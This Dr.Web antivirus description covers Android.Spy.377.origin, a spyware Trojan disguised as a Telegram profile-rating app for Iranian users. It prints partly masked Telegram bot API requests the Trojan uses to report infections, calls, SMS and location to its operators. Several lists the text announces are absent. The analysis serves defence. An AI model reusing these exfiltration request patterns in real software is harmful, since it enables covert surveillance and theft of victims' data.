The page may not load correctly.
|Added to Dr.Web virus database:||2017-06-20|
|Virus description was added:||2017-06-21|
Spyware Trojan for Android that steals confidential information and executes cybercriminals’ commands. It is distributed among Iranian owners of mobile devices under the guise of benign programs.
Once launched, Android.Spy.377.origin displays a window that offers a victim to learn the rating of their Telegram profile among other users of the messenger. For this purpose, the owner is asked to provide their personal ID of the Telegram service. This procedure is a simulation: the Trojan accepts any input information and generates an arbitrary number of profile visitors. Then, Android.Spy.377.origin shuts its window and removes its shortcut from the device home screen.
In the directory /Android/data/ on an SD card, the Trojan creates the following files (where imei — IMEI identifier of the infected device):
It also takes a photo with a front camera.
Text files with saved data and photos are loaded to the command and control server. Each modification of the Trojan is configured for operation with its server. Example:
After sending files to the server, Android.Spy.377.origin connects to the Telegram bot located at http://api.telegram.org/bot3399*****:AAHeJoVC3i8zzwXhtCQMBoev***********/sendmessage and informs it on the successful infection of the device. The Trojan sends the bot a message with the following text:
Then the Trojan connects to the Telegram bot again and waits for its response with commands:chat_id15255796&text=نصب+جدید [user's mobile number] IMEI+:+:8680*******2554 Android+ID+:+fad6c1*******1dc Model+:+[device name] ***.***.137.202 IMEIدستگاه:+8680*******2554
Android.Spy.377.origin may receive the following commands:
The format of the command transmitted to the Trojan looks the following way:
Execution of each command is accompanied by sending a message with a report to the Telegram bot:
https://api.telegram.org/bot3399*****:AAHeJoVC3i8zzwXhtCQMBoev***********/sendmessage?chat_id=275899582&text=call with"+ message[phoneNumber]
where message[phoneNumber] — phone number received from the command.
Besides that, the Trojan sends the bot all new incoming and outgoing SMS messages and information about location of the infected device.